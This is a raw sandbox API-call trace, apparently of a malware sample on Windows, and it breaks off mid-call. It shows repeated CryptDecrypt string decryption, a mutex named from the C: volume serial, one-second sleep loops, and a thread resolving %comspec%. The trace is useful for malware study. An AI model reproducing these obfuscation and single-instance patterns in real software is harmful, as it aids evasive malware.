RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0227.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0227.032] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0227.033] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0227.033] CryptDestroyKey (hKey=0xa328a8) returned 1 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0227.033] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0227.033] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0227.033] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0227.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0227.033] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0227.033] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0227.033] CryptDestroyKey (hKey=0xa328a8) returned 1 [0227.033] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0227.033] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0227.033] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0227.033] CloseHandle (hObject=0x1e4) returned 1 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0227.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0227.033] Sleep (dwMilliseconds=0x3e8) [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0228.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0228.174] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0228.174] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0228.174] CryptDestroyKey (hKey=0xa328a8) returned 1 [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0228.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0228.174] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0228.174] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0228.174] CryptDestroyKey (hKey=0xa328a8) returned 1 [0228.174] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0228.174] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0228.174] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0228.174] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0228.174] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0228.174] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0228.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0228.174] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0228.174] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0228.174] CryptDestroyKey (hKey=0xa328a8) returned 1 [0228.174] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0228.174] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0228.174] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0228.175] CloseHandle (hObject=0x1e4) returned 1 [0228.175] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0228.175] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0228.175] Sleep (dwMilliseconds=0x3e8) [0229.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0229.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0229.219] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0229.219] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0229.219] CryptDestroyKey (hKey=0xa328a8) returned 1 [0229.220] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0229.220] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0229.220] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0229.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0229.220] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0229.220] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0229.220] CryptDestroyKey (hKey=0xa328a8) returned 1 [0229.220] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0229.220] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0229.220] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0229.220] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0229.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0229.221] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0229.221] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0229.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0229.221] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0229.221] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0229.221] CryptDestroyKey (hKey=0xa328a8) returned 1 [0229.221] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0229.221] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0229.222] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0229.222] CloseHandle (hObject=0x1e4) returned 1 [0229.222] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0229.222] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0229.222] Sleep (dwMilliseconds=0x3e8) [0230.233] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0230.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0230.234] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0230.234] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0230.234] CryptDestroyKey (hKey=0xa328a8) returned 1 [0230.234] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0230.234] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0230.234] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0230.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0230.234] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0230.234] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0230.234] CryptDestroyKey (hKey=0xa328a8) returned 1 [0230.234] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0230.235] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0230.235] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0230.235] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0230.235] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0230.235] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0230.235] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0230.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0230.236] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0230.236] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0230.236] CryptDestroyKey (hKey=0xa328a8) returned 1 [0230.236] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0230.236] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0230.236] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0230.236] CloseHandle (hObject=0x1e4) returned 1 [0230.236] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0230.237] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0230.237] Sleep (dwMilliseconds=0x3e8) [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0231.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0231.247] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0231.247] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0231.247] CryptDestroyKey (hKey=0xa328a8) returned 1 [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0231.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0231.247] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0231.247] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0231.247] CryptDestroyKey (hKey=0xa328a8) returned 1 [0231.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0231.247] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0231.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0231.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0231.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.247] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0231.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0231.247] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0231.247] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0231.247] CryptDestroyKey (hKey=0xa328a8) returned 1 [0231.247] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0231.248] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0231.248] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0231.248] CloseHandle (hObject=0x1e4) returned 1 [0231.248] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0231.248] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0231.248] Sleep (dwMilliseconds=0x3e8) [0232.261] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0232.261] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0232.261] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0232.261] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0232.261] CryptDestroyKey (hKey=0xa328a8) returned 1 [0232.261] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0232.261] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0232.261] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0232.261] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0232.261] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0232.261] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0232.262] CryptDestroyKey (hKey=0xa328a8) returned 1 [0232.262] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0232.262] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0232.262] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0232.262] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0232.262] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.262] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0232.262] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0232.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0232.262] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0232.262] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0232.262] CryptDestroyKey (hKey=0xa328a8) returned 1 [0232.262] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0232.262] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0232.263] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0232.263] CloseHandle (hObject=0x1e4) returned 1 [0232.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0232.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0232.263] Sleep (dwMilliseconds=0x3e8) Thread: id = 109 os_tid = 0x5d8 [0124.035] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14d8 [0124.035] CryptImportKey (in: hProv=0xa24cf8, pbData=0x201f8fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x201f964 | out: phKey=0x201f964*=0xa275f0) returned 1 [0124.035] CryptSetKeyParam (hKey=0xa275f0, dwParam=0x1, pbData=0x201f94c, dwFlags=0x0) returned 1 [0124.035] CryptDecrypt (in: hKey=0xa275f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x201f918 | out: pbData=0x20f14d8, pdwDataLen=0x201f918) returned 1 [0124.035] CryptDestroyKey (hKey=0xa275f0) returned 1 [0124.035] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f1500 [0124.035] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x14) returned 0x20f1668 [0124.035] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1688 [0124.035] CryptImportKey (in: hProv=0xa24cf8, pbData=0x201f8d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x201f93c | out: phKey=0x201f93c*=0xa275f0) returned 1 [0124.036] CryptSetKeyParam (hKey=0xa275f0, dwParam=0x1, pbData=0x201f924, dwFlags=0x0) returned 1 [0124.036] CryptDecrypt (in: hKey=0xa275f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1688, pdwDataLen=0x201f8f0 | out: pbData=0x20f1688, pdwDataLen=0x201f8f0) returned 1 [0124.036] CryptDestroyKey (hKey=0xa275f0) returned 1 [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1688 | out: hHeap=0x20f0000) returned 1 [0124.036] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f1500, nSize=0xa | out: lpDst="") returned 0x1c [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1668 | out: hHeap=0x20f0000) returned 1 [0124.036] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x26) returned 0x20f1500 [0124.036] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x26) returned 0x20f1668 [0124.036] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1698 [0124.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x201f8d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x201f938 | out: phKey=0x201f938*=0xa275f0) returned 1 [0124.036] CryptSetKeyParam (hKey=0xa275f0, dwParam=0x1, pbData=0x201f920, dwFlags=0x0) returned 1 [0124.036] CryptDecrypt (in: hKey=0xa275f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1698, pdwDataLen=0x201f8ec | out: pbData=0x20f1698, pdwDataLen=0x201f8ec) returned 1 [0124.036] CryptDestroyKey (hKey=0xa275f0) returned 1 [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1698 | out: hHeap=0x20f0000) returned 1 [0124.036] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f1500, nSize=0x13 | out: lpDst="") returned 0x1c [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1668 | out: hHeap=0x20f0000) returned 1 [0124.036] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x4a) returned 0x20f1668 [0124.036] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4a) returned 0x20f16c0 [0124.036] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0124.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x201f8d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x201f938 | out: phKey=0x201f938*=0xa275f0) returned 1 [0124.036] CryptSetKeyParam (hKey=0xa275f0, dwParam=0x1, pbData=0x201f920, dwFlags=0x0) returned 1 [0124.036] CryptDecrypt (in: hKey=0xa275f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x201f8ec | out: pbData=0x20f5498, pdwDataLen=0x201f8ec) returned 1 [0124.036] CryptDestroyKey (hKey=0xa275f0) returned 1 [0124.036] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.036] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", 